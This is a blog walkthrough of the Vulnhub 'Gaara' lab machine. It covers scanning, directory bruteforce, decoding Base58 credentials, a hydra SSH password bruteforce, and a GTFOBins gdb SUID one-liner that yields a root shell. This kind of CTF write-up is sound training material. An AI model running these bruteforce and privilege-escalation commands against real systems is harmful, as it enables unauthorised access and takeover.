NepCodeX

Byte Musings: Where Tech Meets Curiosity


Gaara Walkthrough – Vulnhub – Writeup

gaara walkthrough writeup vulnhub

Gaara by 0xJin is an easy machine from Vulnhub. However, there are some rabbit holes alongside. Also, I have tested this machine on VirtualBox. “Gaara Walkthrough – Vulnhub – Writeup”.

Link to the machine: https://www.vulnhub.com/entry/gaara-1,629/

Crossroads Walkthrough – Vulnhub – Writeup

Identify the target

As usual, we have to identify the IP address of the target machine.

sudo netdiscover -i eth0 -r 10.0.2.0/24
image 190

Scan open ports

Next, we have to scan the open ports on the target machine.

nmap -v -T4 -sC -sV -p- -oN nmap.log 10.0.2.62
image 191

This is a simple machine that has HTTP and SSH services available.

Enumerate the web server

The default page had an image and nothing more.

image 192

Thus, we have to try bruteforcing the directories.

gobuster dir -u http://10.0.2.62 -x txt,php,html --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -o dir.log
image 193

There is an interesting path that we need to check.

image 194

There are three paths to check again. So, I looked at them one by one. All of them contained long texts. Hence, I decided to get unique words from them.

curl http://10.0.2.62/iamGaara | grep -oE '\w+' | sort -u -f | more
image 195

The path /iamGaara gave me an encoded text that I could decrypt using Cyber Chef. We can see that the text has lowercase and numbers (1,9), we can confirm this is not Base32. Testing for Base58 gave me credentials.

image 196

However, this didn’t work on the SSH server. But still, we have a username to bruteforce password.

hydra -l gaara -P /home/kali/rockyou.txt  10.0.2.62 ssh
image 197

Finally, I got a password. Then, I got the shell access of the user.

ssh [email protected]
image 198

Root privilege escalation

On the directory, there is a file Kazekage.txt that has a path. This is a rabbit hole, but let’s see.

image 199

On the directory, there is a secret file.

image 200

There is a brainf*ck encoded text that reads the following.

image 201

Next, I checked the SUID binaries on the system.

find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
image 202

The binary gdb had setuid permissions. Hence, we can do privilege escalation from here.

Reference: https://gtfobins.github.io/gtfobins/gdb/#suid

gdb -nx -ex 'python import os; os.execl("/bin/bash", "bash", "-p")' -ex quit
image 203

Finally, we got the bash shell with root access. Next, we have the root flag.

image 204



0 0 votes
Article Rating
Subscribe
Notify of
guest
2 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments